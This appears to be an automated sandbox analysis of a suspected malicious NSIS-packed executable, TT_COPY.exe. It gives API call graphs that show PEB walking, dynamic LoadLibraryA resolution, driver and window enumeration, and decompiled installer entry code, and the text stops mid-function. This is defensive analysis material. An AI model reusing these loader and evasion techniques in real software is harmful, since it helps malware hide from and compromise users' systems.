9635->9637 9635->9639 9637->9639 9638->9634 9640 404c74 9639->9640 9641 404e0f 20 API calls 9639->9641 9642 404c97 9640->9642 9644 40140b 2 API calls 9640->9644 9643 404c61 9641->9643 9657 4044bb EnableWindow 9642->9657 9645 404c76 SetDlgItemTextW 9643->9645 9646 404c66 9643->9646 9644->9642 9645->9640 9648 404d46 20 API calls 9646->9648 9648->9640 9649 404cb3 9649->9650 9651 4048e3 SendMessageW 9649->9651 9650->9603 9651->9650 9652->9599 9653->9622 9654->9607 9655->9624 9656->9632 9657->9649 9658 70b51979 9659 70b5199c 9658->9659 9660 70b519d1 GlobalFree 9659->9660 9661 70b519e3 9659->9661 9660->9661 9662 70b51312 2 API calls 9661->9662 9663 70b51b6e GlobalFree GlobalFree 9662->9663 8955 401491 8956 40559f 24 API calls 8955->8956 8957 401498 8956->8957 8958 402891 8959 402898 8958->8959 8962 402ba9 8958->8962 8960 402d84 17 API calls 8959->8960 8961 40289f 8960->8961 8963 4028ae SetFilePointer 8961->8963 8963->8962 8964 4028be 8963->8964 8966 406484 wsprintfW 8964->8966 8966->8962 9664 402f93 9665 402fa5 SetTimer 9664->9665 9666 402fbe 9664->9666 9665->9666 9667 403013 9666->9667 9668 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 9666->9668 9668->9667 8208 2b5e760 8209 2b5e762 8208->8209 8211 2b5e813 8209->8211 8214 2b5e82f 8209->8214 8212 2b5e8d8 8211->8212 8213 2b6bb14 12 API calls 8211->8213 8213->8212 8215 2b5e854 8214->8215 8216 2b5e8d8 8215->8216 8217 2b6bb14 12 API calls 8215->8217 8216->8211 8217->8216 8417 403f9a 8418 403fb2 8417->8418 8419 404113 8417->8419 8418->8419 8421 403fbe 8418->8421 8420 404124 GetDlgItem GetDlgItem 8419->8420 8424 404164 8419->8424 8422 404499 18 API calls 8420->8422 8425 403fc9 SetWindowPos 8421->8425 8426 403fdc 8421->8426 8429 40414e SetClassLongW 8422->8429 8423 4041be 8430 4044e5 SendMessageW 8423->8430 8437 40410e 8423->8437 8424->8423 8436 401389 2 API calls 8424->8436 8425->8426 8427 403fe5 ShowWindow 8426->8427 8428 404027 8426->8428 8431 404100 8427->8431 8432 404005 GetWindowLongW 8427->8432 8433 404046 8428->8433 8434 40402f DestroyWindow 8428->8434 8435 40140b 2 API calls 8429->8435 8460 4041d0 8430->8460 8500 404500 8431->8500 8432->8431 8438 40401e ShowWindow 8432->8438 8440 40404b SetWindowLongW 8433->8440 8441 40405c 8433->8441 8439 404443 8434->8439 8435->8424 8442 404196 8436->8442 8438->8428 8439->8437 8448 404453 ShowWindow 8439->8448 8440->8437 8441->8431 8446 404068 GetDlgItem 8441->8446 8442->8423 8447 40419a SendMessageW 8442->8447 8444 40140b 2 API calls 8444->8460 8445 404424 DestroyWindow EndDialog 8445->8439 8449 404096 8446->8449 8450 404079 SendMessageW IsWindowEnabled 8446->8450 8447->8437 8448->8437 8452 4040a3 8449->8452 8453 4040b6 8449->8453 8454 4040ea SendMessageW 8449->8454 8463 40409b 8449->8463 8450->8437 8450->8449 8451 40657a 17 API calls 8451->8460 8452->8454 8452->8463 8457 4040d3 8453->8457 8458 4040be 8453->8458 8454->8431 8456 404499 18 API calls 8456->8460 8462 40140b 2 API calls 8457->8462 8461 40140b 2 API calls 8458->8461 8459 4040d1 8459->8431 8460->8437 8460->8444 8460->8445 8460->8451 8460->8456 8481 404364 DestroyWindow 8460->8481 8491 404499 8460->8491 8461->8463 8464 4040da 8462->8464 8497 404472 8463->8497 8464->8431 8464->8463 8466 40424b GetDlgItem 8467 404260 8466->8467 8468 404268 ShowWindow KiUserCallbackDispatcher 8466->8468 8467->8468 8494 4044bb EnableWindow 8468->8494 8470 404292 EnableWindow 8475 4042a6 8470->8475 8471 4042ab GetSystemMenu EnableMenuItem SendMessageW 8472 4042db SendMessageW 8471->8472 8471->8475 8472->8475 8474 403f7b 18 API calls 8474->8475 8475->8471 8475->8474 8495 4044ce SendMessageW 8475->8495 8496 40653d lstrcpynW 8475->8496 8477 40430a lstrlenW 8478 40657a 17 API calls 8477->8478 8479 404320 SetWindowTextW 8478->8479 8480 401389 2 API calls 8479->8480 8480->8460 8481->8439 8482 40437e CreateDialogParamW 8481->8482 8482->8439 8483 4043b1 8482->8483 8484 404499 18 API calls 8483->8484 8485 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 8484->8485 8486 401389 2 API calls 8485->8486 8487 404402 8486->8487 8487->8437 8488 40440a ShowWindow 8487->8488 8489 4044e5 SendMessageW 8488->8489 8490 404422 8489->8490 8490->8439 8492 40657a 17 API calls 8491->8492 8493 4044a4 SetDlgItemTextW 8492->8493 8493->8466 8494->8470 8495->8475 8496->8477 8498 404479 8497->8498 8499 40447f SendMessageW 8497->8499 8498->8499 8499->8459 8501 4045c3 8500->8501 8502 404518 GetWindowLongW 8500->8502 8501->8437 8502->8501 8503 40452d 8502->8503 8503->8501 8504 40455a GetSysColor 8503->8504 8505 40455d 8503->8505 8504->8505 8506 404563 SetTextColor 8505->8506 8507 40456d SetBkMode 8505->8507 8506->8507 8508 404585 GetSysColor 8507->8508 8509 40458b 8507->8509 8508->8509 8510 404592 SetBkColor 8509->8510 8511 40459c 8509->8511 8510->8511 8511->8501 8512 4045b6 CreateBrushIndirect 8511->8512 8513 4045af DeleteObject 8511->8513 8512->8501 8513->8512 9669 401b9b 9670 401ba8 9669->9670 9671 401bec 9669->9671 9674 401c31 9670->9674 9679 401bbf 9670->9679 9672 401bf1 9671->9672 9673 401c16 GlobalAlloc 9671->9673 9682 40239d 9672->9682 9690 40653d lstrcpynW 9672->9690 9676 40657a 17 API calls 9673->9676 9675 40657a 17 API calls 9674->9675 9674->9682 9678 402397 9675->9678 9676->9674 9678->9682 9683 405b9d MessageBoxIndirectW 9678->9683 9688 40653d lstrcpynW 9679->9688 9680 401c03 GlobalFree 9680->9682 9683->9682 9684 401bce 9689 40653d lstrcpynW 9684->9689 9686 401bdd 9691 40653d lstrcpynW 9686->9691 9688->9684 9689->9686 9690->9680 9691->9682 9692 2b6f76a 9693 2b6f78e 9692->9693 9695 2b6f79d 9692->9695 9694 2b6f513 11 API calls 9693->9694 9693->9695 9694->9695 8534 40259e 8535 402de6 17 API calls 8534->8535 8536 4025a8 8535->8536 8537 402d84 17 API calls 8536->8537 8538 4025b1 8537->8538 8539 4025d9 RegEnumValueW 8538->8539 8540 4025cd RegEnumKeyW 8538->8540 8542 40292e 8538->8542 8541 4025ee RegCloseKey 8539->8541 8540->8541 8541->8542 8971 40149e 8972 4014ac PostQuitMessage 8971->8972 8973 40239d 8971->8973 8972->8973 7595 4015a3 7596 402da6 17 API calls 7595->7596 7597 4015aa SetFileAttributesW 7596->7597 7598 4015bc 7597->7598 7599 2b6ac52 7600 2b6ac8c 7599->7600 7603 2b6b058 7600->7603 7602 2b6ae45 7604 2b6b08e 7603->7604 7605 2b6b3b2 CreateFileA 7604->7605 7608 2b66043 7604->7608 7605->7602 7607 2b6f5a0 7607->7602 7608->7607 7612 2b6ef1d 7608->7612 7610 2b6edc0 K32EnumDeviceDrivers 7611 2b6ee17 7610->7611 7613 2b5e2db 7612->7613 7613->7612 7615 2b6f002 7613->7615 7617 2b5e2e0 7613->7617 7646 2b5e0e2 7613->7646 7615->7610 7616 2b6bbf6 LoadLibraryA 7630 2b6bc13 7616->7630 7617->7616 7618 2b6bbda 7617->7618 7626 2b66043 7617->7626 7650 2b6c27d GetPEB 7618->7650 7621 2b6bc03 7621->7610 7622 2b6bbe5 7623 2b6bc13 8 API calls 7622->7623 7624 2b6bbf1 7623->7624 7624->7616 7625 2b6f5a0 7625->7610 7626->7625 7627 2b6ef1d 8 API calls 7626->7627 7628 2b6edc0 K32EnumDeviceDrivers 7627->7628 7629 2b6ee17 7628->7629 7632 2b6bb14 7630->7632 7631 2b6bde9 7631->7621 7632->7631 7633 2b6bbf6 LoadLibraryA 7632->7633 7634 2b6bbda 7632->7634 7642 2b66043 7632->7642 7635 2b6bc13 8 API calls 7633->7635 7636 2b6c27d 8 API calls 7634->7636 7637 2b6bc03 7635->7637 7638 2b6bbe5 7636->7638 7637->7621 7639 2b6bc13 8 API calls 7638->7639 7640 2b6bbf1 7639->7640 7640->7633 7641 2b6f5a0 7641->7621 7642->7641 7643 2b6ef1d 8 API calls 7642->7643 7644 2b6edc0 K32EnumDeviceDrivers 7643->7644 7645 2b6ee17 7644->7645 7648 2b5e0c0 7646->7648 7647 2b5e1e0 7648->7646 7648->7647 7649 2b5e19c EnumWindows 7648->7649 7649->7617 7651 2b6c2d7 7650->7651 7652 2b6c3b6 7651->7652 7654 2b6c37b 7651->7654 7652->7622 7654->7651 7655 2b6c3b0 7654->7655 7656 2b6c3ea 7654->7656 7655->7622 7658 2b6c3fa 7656->7658 7660 2b6bb14 7656->7660 7663 2b6c490 7658->7663 7674 2b6c498 7658->7674 7659 2b6bbf6 LoadLibraryA 7662 2b6bc13 8 API calls 7659->7662 7660->7659 7661 2b6bbda 7660->7661 7670 2b66043 7660->7670 7664 2b6c27d 8 API calls 7661->7664 7665 2b6bc03 7662->7665 7663->7654 7666 2b6bbe5 7664->7666 7665->7654 7667 2b6bc13 8 API calls 7666->7667 7668 2b6bbf1 7667->7668 7668->7659 7669 2b6f5a0 7669->7654 7670->7669 7671 2b6ef1d 8 API calls 7670->7671 7672 2b6edc0 K32EnumDeviceDrivers 7671->7672 7673 2b6ee17 7672->7673 7675 2b6c4d6 7674->7675 7677 2b6bb14 7674->7677 7675->7658 7676 2b6bbf6 LoadLibraryA 7679 2b6bc13 8 API calls 7676->7679 7677->7676 7678 2b6bbda 7677->7678 7686 2b66043 7677->7686 7680 2b6c27d 8 API calls 7678->7680 7681 2b6bc03 7679->7681 7682 2b6bbe5 7680->7682 7681->7658 7683 2b6bc13 8 API calls 7682->7683 7684 2b6bbf1 7683->7684 7684->7676 7685 2b6f5a0 7685->7658 7686->7685 7687 2b6ef1d 8 API calls 7686->7687 7688 2b6edc0 K32EnumDeviceDrivers 7687->7688 7689 2b6ee17 7688->7689 7690 401fa4 7691 402da6 17 API calls 7690->7691 7692 401faa 7691->7692 7693 40559f 24 API calls 7692->7693 7694 401fb4 7693->7694 7705 405b20 CreateProcessW 7694->7705 7697 401fdd CloseHandle 7701 40292e 7697->7701 7700 401fcf 7702 401fd4 7700->7702 7703 401fdf 7700->7703 7713 406484 wsprintfW 7702->7713 7703->7697 7706 405b53 CloseHandle 7705->7706 7707 401fba 7705->7707 7706->7707 7707->7697 7707->7701 7708 4069b5 WaitForSingleObject 7707->7708 7709 4069cf 7708->7709 7710 4069e1 GetExitCodeProcess 7709->7710 7714 406946 7709->7714 7710->7700 7713->7697 7715 406963 PeekMessageW 7714->7715 7716 406973 WaitForSingleObject 7715->7716 7717 406959 DispatchMessageW 7715->7717 7716->7709 7717->7715 9003 2b68a50 GetPEB 9696 4021aa 9697 402da6 17 API calls 9696->9697 9698 4021b1 9697->9698 9699 402da6 17 API calls 9698->9699 9700 4021bb 9699->9700 9701 402da6 17 API calls 9700->9701 9702 4021c5 9701->9702 9703 402da6 17 API calls 9702->9703 9704 4021cf 9703->9704 9705 402da6 17 API calls 9704->9705 9706 4021d9 9705->9706 9707 402218 CoCreateInstance 9706->9707 9708 402da6 17 API calls 9706->9708 9711 402237 9707->9711 9708->9707 9709 401423 24 API calls 9710 4022f6 9709->9710 9711->9709 9711->9710 9712 403baa 9713 403bb5 9712->9713 9714 403bb9 9713->9714 9715 403bbc GlobalAlloc 9713->9715 9715->9714 9008 70b51058 9009 70b51074 9008->9009 9010 70b510dd 9009->9010 9011 70b515b6 GlobalFree 9009->9011 9012 70b51092 9009->9012 9011->9012 9013 70b515b6 GlobalFree 9012->9013 9014 70b510a2 9013->9014 9015 70b510b2 9014->9015 9016 70b510a9 GlobalSize 9014->9016 9017 70b510b6 GlobalAlloc 9015->9017 9018 70b510c7 9015->9018 9016->9015 9019 70b515dd 3 API calls 9017->9019 9020 70b510d2 GlobalFree 9018->9020 9019->9018 9020->9010 9021 2b6ca47 9024 2b6bb14 9021->9024 9022 2b6cace 9023 2b6bbf6 LoadLibraryA 9026 2b6bc13 10 API calls 9023->9026 9024->9022 9024->9023 9025 2b6bbda 9024->9025 9033 2b66043 9024->9033 9027 2b6c27d 10 API calls 9025->9027 9028 2b6bc03 9026->9028 9029 2b6bbe5 9027->9029 9030 2b6bc13 10 API calls 9029->9030 9031 2b6bbf1 9030->9031 9031->9023 9032 2b6f5a0 9033->9032 9034 2b6ef1d 10 API calls 9033->9034 9035 2b6edc0 K32EnumDeviceDrivers 9034->9035 9036 2b6ee17 9035->9036 9720 4023b2 9721 4023c0 9720->9721 9722 4023ba 9720->9722 9724 4023ce 9721->9724 9725 402da6 17 API calls 9721->9725 9723 402da6 17 API calls 9722->9723 9723->9721 9726 4023dc 9724->9726 9727 402da6 17 API calls 9724->9727 9725->9724 9728 402da6 17 API calls 9726->9728 9727->9726 9729 4023e5 WritePrivateProfileStringW 9728->9729 9042 2b66043 9043 2b6ebf3 9042->9043 9043->9042 9044 2b6ef1d 10 API calls 9043->9044 9045 2b6edc0 K32EnumDeviceDrivers 9044->9045 9046 2b6ee17 9045->9046 9730 70b52d43 9731 70b52d5b 9730->9731 9732 70b5162f 2 API calls 9731->9732 9733 70b52d76 9732->9733 9047 2b61641 9048 2b61644 9047->9048 9049 2b6ebee 11 API calls 9048->9049 9050 2b61663 9049->9050 9051 4014b8 9052 4014be 9051->9052 9053 401389 2 API calls 9052->9053 9054 4014c6 9053->9054 9734 2b62949 9735 2b62965 9734->9735 9736 2b629a1 9735->9736 9738 2b62c21 9735->9738 9739 2b6ebee 11 API calls 9736->9739 9741 2b62a1e 9736->9741 9737 2b62bc3 9740 2b6bbf6 LoadLibraryA 9738->9740 9742 2b6bbda 9738->9742 9751 2b66043 9738->9751 9739->9741 9743 2b6bc13 10 API calls 9740->9743 9741->9737 9746 2b6ebee 11 API calls 9741->9746 9744 2b6c27d 10 API calls 9742->9744 9745 2b6bc03 9743->9745 9747 2b6bbe5 9744->9747 9746->9737 9748 2b6bc13 10 API calls 9747->9748 9749 2b6bbf1 9748->9749 9749->9740 9750 2b6f5a0 9751->9750 9752 2b6ef1d 10 API calls 9751->9752 9753 2b6edc0 K32EnumDeviceDrivers 9752->9753 9754 2b6ee17 9753->9754

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 40352d-40357d SetErrorMode GetVersionExW 1 4035b7-4035be 0->1 2 40357f-4035b3 GetVersionExW 0->2 3 4035c0 1->3 4 4035c8-403608 1->4 2->1 3->4 5 40360a-403612 call 40690a 4->5 6 40361b 4->6 5->6 11 403614 5->11 7 403620-403634 call 40689a lstrlenA 6->7 13 403636-403652 call 40690a * 3 7->13 11->6 20 403663-4036c5 #17 OleInitialize SHGetFileInfoW call 40653d GetCommandLineW call 40653d 13->20 21 403654-40365a 13->21 28 4036c7-4036c9 20->28 29 4036ce-4036e1 call 405e39 CharNextW 20->29 21->20 25 40365c 21->25 25->20 28->29 32 4037d8-4037de 29->32 33 4037e4 32->33 34 4036e6-4036ec 32->34 35 4037f8-403812 GetTempPathW call 4034fc 33->35 36 4036f5-4036fb 34->36 37 4036ee-4036f3 34->37 46 403814-403832 GetWindowsDirectoryW lstrcatW call 4034fc 35->46 47 40386a-403882 DeleteFileW call 40307d 35->47 39 403702-403706 36->39 40 4036fd-403701 36->40 37->36 37->37 41 4037c6-4037d4 call 405e39 39->41 42 40370c-403712 39->42 40->39 41->32 61 4037d6-4037d7 41->61 44 403714-40371b 42->44 45 40372c-403765 42->45 49 403722 44->49 50 40371d-403720 44->50 51 403781-4037bb 45->51 52 403767-40376c 45->52 46->47 66 403834-403864 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fc 46->66 62 403888-40388e 47->62 63 403a59-403a67 call 403b12 OleUninitialize 47->63 49->45 50->45 50->49 58 4037c3-4037c5 51->58 59 4037bd-4037c1 51->59 52->51 56 40376e-403776 52->56 64 403778-40377b 56->64 65 40377d 56->65 58->41 59->58 67 4037e6-4037f3 call 40653d 59->67 61->32 68 403894-4038a7 call 405e39 62->68 69 403935-40393c call 403bec 62->69 79 403a69-403a78 call 405b9d ExitProcess 63->79 80 403a7e-403a84 63->80 64->51 64->65 65->51 66->47 66->63 67->35 81 4038f9-403906 68->81 82 4038a9-4038de 68->82 78 403941-403944 69->78 78->63 84 403a86-403a9b GetCurrentProcess OpenProcessToken 80->84 85 403afc-403b04 80->85 89 403908-403916 call 405f14 81->89 90 403949-40395d call 405b08 lstrcatW 81->90 86 4038e0-4038e4 82->86 92 403acc-403ada call 40690a 84->92 93 403a9d-403ac6 LookupPrivilegeValueW AdjustTokenPrivileges 84->93 87 403b06 85->87 88 403b09-403b0c ExitProcess 85->88 95 4038e6-4038eb 86->95 96 4038ed-4038f5 86->96 87->88 89->63 107 40391c-403932 call 40653d * 2 89->107 105 40396a-403984 lstrcatW lstrcmpiW 90->105 106 40395f-403965 lstrcatW 90->106 103 403ae8-403af3 ExitWindowsEx 92->103 104 403adc-403ae6 92->104 93->92 95->96 100 4038f7 95->100 96->86 96->100 100->81 103->85 108 403af5-403af7 call 40140b 103->108 104->103 104->108 109 403a57 105->109 110 40398a-40398d 105->110 106->105 107->69 108->85 109->63 114 403996 call 405aeb 110->114 115 40398f-403994 call 405a6e 110->115 120 40399b-4039ab SetCurrentDirectoryW 114->120 115->120 123 4039b8-4039e4 call 40653d 120->123 124 4039ad-4039b3 call 40653d 120->124 128 4039e9-403a04 call 40657a DeleteFileW 123->128 124->123 131 403a44-403a4e 128->131 132 403a06-403a16 CopyFileW 128->132 131->128 133 403a50-403a52 call 4062fd 131->133 132->131 134 403a18-403a38 call 4062fd call 40657a call 405b20 132->134 133->109 134->131 142 403a3a-403a41 CloseHandle 134->142 142->131
                                                                                                                            C-Code - Quality: 79%
                                                                                                                            			_entry_() {
                                                                                                                            				WCHAR* _v8;
                                                                                                                            				signed int _v12;
                                                                                                                            				void* _v16;
                                                                                                                            				signed int _v20;
                                                                                                                            				int _v24;
                                                                                                                            				int _v28;
                                                                                                                            				struct _TOKEN_PRIVILEGES _v40;
                                                                                                                            				signed char _v42;
                                                                                                                            				int _v44;
                                                                                                                            				signed int _v48;
                                                                                                                            				intOrPtr _v278;
                                                                                                                            				signed short _v310;
                                                                                                                            				struct _OSVERSIONINFOW _v324;
                                                                                                                            				struct _SHFILEINFOW _v1016;
                                                                                                                            				intOrPtr* _t88;
                                                                                                                            				intOrPtr* _t94;
                                                                                                                            				void _t97;
                                                                                                                            				void* _t116;
                                                                                                                            				WCHAR* _t118;
                                                                                                                            				signed int _t120;
                                                                                                                            				intOrPtr* _t124;
                                                                                                                            				void* _t138;
                                                                                                                            				short _t144;
                                                                                                                            				void* _t149;
                                                                                                                            				void* _t153;
                                                                                                                            				void* _t158;
                                                                                                                            				signed int _t168;
                                                                                                                            				void* _t171;
                                                                                                                            				void* _t176;
                                                                                                                            				intOrPtr _t178;
                                                                                                                            				intOrPtr _t179;
                                                                                                                            				intOrPtr* _t180;
                                                                                                                            				int _t189;
                                                                                                                            				void* _t190;
                                                                                                                            				void* _t199;
                                                                                                                            				signed int _t205;
                                                                                                                            				signed int _t210;
                                                                                                                            				signed int _t215;
                                                                                                                            				int* _t219;
                                                                                                                            				signed int _t227;
                                                                                                                            				signed int _t230;
                                                                                                                            				CHAR* _t232;
                                                                                                                            				signed int _t234;
                                                                                                                            				WCHAR* _t235;
                                                                                                                            
                                                                                                                            				0x440000 = 0x20;
                                                                                                                            				_t189 = 0;
                                                                                                                            				_v24 = 0;
                                                                                                                            				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                            				_v20 = 0;
                                                                                                                            				SetErrorMode(0x8001); // executed
                                                                                                                            				_v324.szCSDVersion = 0;
                                                                                                                            				_v48 = 0;
                                                                                                                            				_v44 = 0;
                                                                                                                            				_v324.dwOSVersionInfoSize = 0x11c;
                                                                                                                            				if(GetVersionExW( &_v324) == 0) {
                                                                                                                            					_v324.dwOSVersionInfoSize = 0x114;
                                                                                                                            					GetVersionExW( &_v324);
                                                                                                                            					asm("sbb eax, eax");
                                                                                                                            					_v42 = 4;
                                                                                                                            					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                                                                                            				}
                                                                                                                            				if(_v324.dwMajorVersion < 0xa) {
                                                                                                                            					_v310 = _v310 & 0x00000000;
                                                                                                                            				}
                                                                                                                            				 *0x434fb8 = _v324.dwBuildNumber;
                                                                                                                            				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                                                                                            				if( *0x434fbe != 0x600) {
                                                                                                                            					_t180 = E0040690A(_t189);
                                                                                                                            					if(_t180 != _t189) {
                                                                                                                            						 *_t180(0xc00);
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				_t232 = "UXTHEME";
                                                                                                                            				do {
                                                                                                                            					E0040689A(_t232); // executed
                                                                                                                            					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                                                                                                                            				} while ( *_t232 != 0);
                                                                                                                            				E0040690A(0xb);
                                                                                                                            				 *0x434f04 = E0040690A(9);
                                                                                                                            				_t88 = E0040690A(7);
                                                                                                                            				if(_t88 != _t189) {
                                                                                                                            					_t88 =  *_t88(0x1e);
                                                                                                                            					if(_t88 != 0) {
                                                                                                                            						 *0x434fbc =  *0x434fbc | 0x00000080;
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				__imp__#17();
                                                                                                                            				__imp__OleInitialize(_t189); // executed
                                                                                                                            				 *0x434fc0 = _t88;
                                                                                                                            				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
                                                                                                                            				E0040653D(0x433f00, L"NSIS Error");
                                                                                                                            				E0040653D(0x440000, GetCommandLineW());
                                                                                                                            				_t94 = 0x440000;
                                                                                                                            				_t234 = 0x22;
                                                                                                                            				 *0x434f00 = 0x400000;
                                                                                                                            				if( *0x440000 == _t234) {
                                                                                                                            					_t94 = 0x440002;
                                                                                                                            				}
                                                                                                                            				_t199 = CharNextW(E00405E39(_t94, 0x440000));
                                                                                                                            				_v16 = _t199;
                                                                                                                            				while(1) {
                                                                                                                            					_t97 =  *_t199;
                                                                                                                            					_t252 = _t97 - _t189;
                                                                                                                            					if(_t97 == _t189) {
                                                                                                                            						break;
                                                                                                                            					}
                                                                                                                            					_t210 = 0x20;
                                                                                                                            					__eflags = _t97 - _t210;
                                                                                                                            					if(_t97 != _t210) {
                                                                                                                            						L17:
                                                                                                                            						__eflags =  *_t199 - _t234;
                                                                                                                            						_v12 = _t210;
                                                                                                                            						if( *_t199 == _t234) {
                                                                                                                            							_v12 = _t234;
                                                                                                                            							_t199 = _t199 + 2;
                                                                                                                            							__eflags = _t199;
                                                                                                                            						}
                                                                                                                            						__eflags =  *_t199 - 0x2f;
                                                                                                                            						if( *_t199 != 0x2f) {
                                                                                                                            							L32:
                                                                                                                            							_t199 = E00405E39(_t199, _v12);
                                                                                                                            							__eflags =  *_t199 - _t234;
                                                                                                                            							if(__eflags == 0) {
                                                                                                                            								_t199 = _t199 + 2;
                                                                                                                            								__eflags = _t199;
                                                                                                                            							}
                                                                                                                            							continue;
                                                                                                                            						} else {
                                                                                                                            							_t199 = _t199 + 2;
                                                                                                                            							__eflags =  *_t199 - 0x53;
                                                                                                                            							if( *_t199 != 0x53) {
                                                                                                                            								L24:
                                                                                                                            								asm("cdq");
                                                                                                                            								asm("cdq");
                                                                                                                            								_t215 = L"NCRC" & 0x0000ffff;
                                                                                                                            								asm("cdq");
                                                                                                                            								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
                                                                                                                            								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
                                                                                                                            								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
                                                                                                                            									L29:
                                                                                                                            									asm("cdq");
                                                                                                                            									asm("cdq");
                                                                                                                            									_t210 = L" /D=" & 0x0000ffff;
                                                                                                                            									asm("cdq");
                                                                                                                            									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
                                                                                                                            									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
                                                                                                                            									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
                                                                                                                            										L31:
                                                                                                                            										_t234 = 0x22;
                                                                                                                            										goto L32;
                                                                                                                            									}
                                                                                                                            									__eflags =  *_t199 - _t230;
                                                                                                                            									if( *_t199 == _t230) {
                                                                                                                            										 *(_t199 - 4) = _t189;
                                                                                                                            										__eflags = _t199;
                                                                                                                            										E0040653D(0x440800, _t199);
                                                                                                                            										L37:
                                                                                                                            										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                                                                                            										GetTempPathW(0x400, _t235);
                                                                                                                            										_t116 = E004034FC(_t199, _t252);
                                                                                                                            										_t253 = _t116;
                                                                                                                            										if(_t116 != 0) {
                                                                                                                            											L40:
                                                                                                                            											DeleteFileW(L"1033"); // executed
                                                                                                                            											_t118 = E0040307D(_t255, _v20); // executed
                                                                                                                            											_v8 = _t118;
                                                                                                                            											if(_t118 != _t189) {
                                                                                                                            												L68:
                                                                                                                            												E00403B12();
                                                                                                                            												__imp__OleUninitialize();
                                                                                                                            												if(_v8 == _t189) {
                                                                                                                            													if( *0x434f94 == _t189) {
                                                                                                                            														L77:
                                                                                                                            														_t120 =  *0x434fac;
                                                                                                                            														if(_t120 != 0xffffffff) {
                                                                                                                            															_v24 = _t120;
                                                                                                                            														}
                                                                                                                            														ExitProcess(_v24);
                                                                                                                            													}
                                                                                                                            													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                                                                                            														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                                                                                            														_v40.PrivilegeCount = 1;
                                                                                                                            														_v28 = 2;
                                                                                                                            														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                                                                                                            													}
                                                                                                                            													_t124 = E0040690A(4);
                                                                                                                            													if(_t124 == _t189) {
                                                                                                                            														L75:
                                                                                                                            														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                                                                                            															goto L77;
                                                                                                                            														}
                                                                                                                            														goto L76;
                                                                                                                            													} else {
                                                                                                                            														_push(0x80040002);
                                                                                                                            														_push(0x25);
                                                                                                                            														_push(_t189);
                                                                                                                            														_push(_t189);
                                                                                                                            														_push(_t189);
                                                                                                                            														if( *_t124() == 0) {
                                                                                                                            															L76:
                                                                                                                            															E0040140B(9);
                                                                                                                            															goto L77;
                                                                                                                            														}
                                                                                                                            														goto L75;
                                                                                                                            													}
                                                                                                                            												}
                                                                                                                            												E00405B9D(_v8, 0x200010);
                                                                                                                            												ExitProcess(2);
                                                                                                                            											}
                                                                                                                            											if( *0x434f1c == _t189) {
                                                                                                                            												L51:
                                                                                                                            												 *0x434fac =  *0x434fac | 0xffffffff;
                                                                                                                            												_v24 = E00403BEC(_t265);
                                                                                                                            												goto L68;
                                                                                                                            											}
                                                                                                                            											_t219 = E00405E39(0x440000, _t189);
                                                                                                                            											if(_t219 < 0x440000) {
                                                                                                                            												L48:
                                                                                                                            												_t264 = _t219 - 0x440000;
                                                                                                                            												_v8 = L"Error launching installer";
                                                                                                                            												if(_t219 < 0x440000) {
                                                                                                                            													_t190 = E00405B08(__eflags);
                                                                                                                            													lstrcatW(_t235, L"~nsu");
                                                                                                                            													__eflags = _t190;
                                                                                                                            													if(_t190 != 0) {
                                                                                                                            														lstrcatW(_t235, "A");
                                                                                                                            													}
                                                                                                                            													lstrcatW(_t235, L".tmp");
                                                                                                                            													_t138 = lstrcmpiW(_t235, 0x441800);
                                                                                                                            													__eflags = _t138;
                                                                                                                            													if(_t138 == 0) {
                                                                                                                            														L67:
                                                                                                                            														_t189 = 0;
                                                                                                                            														__eflags = 0;
                                                                                                                            														goto L68;
                                                                                                                            													} else {
                                                                                                                            														__eflags = _t190;
                                                                                                                            														_push(_t235);
                                                                                                                            														if(_t190 == 0) {
                                                                                                                            															E00405AEB();
                                                                                                                            														} else {
                                                                                                                            															E00405A6E();
                                                                                                                            														}
                                                                                                                            														SetCurrentDirectoryW(_t235);
                                                                                                                            														__eflags =  *0x440800;
                                                                                                                            														if( *0x440800 == 0) {
                                                                                                                            															E0040653D(0x440800, 0x441800);
                                                                                                                            														}
                                                                                                                            														E0040653D(0x436000, _v16);
                                                                                                                            														_t202 = "A" & 0x0000ffff;
                                                                                                                            														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                                                                            														__eflags = _t144;
                                                                                                                            														_v12 = 0x1a;
                                                                                                                            														L"KERNEL32::_lread(i r5, i r2, i 0x200000)" = _t144;
                                                                                                                            														do {
                                                                                                                            															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
                                                                                                                            															DeleteFileW(0x42aa28);
                                                                                                                            															__eflags = _v8;
                                                                                                                            															if(_v8 != 0) {
                                                                                                                            																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\TT_COPY.exe", 0x42aa28, 1);
                                                                                                                            																__eflags = _t149;
                                                                                                                            																if(_t149 != 0) {
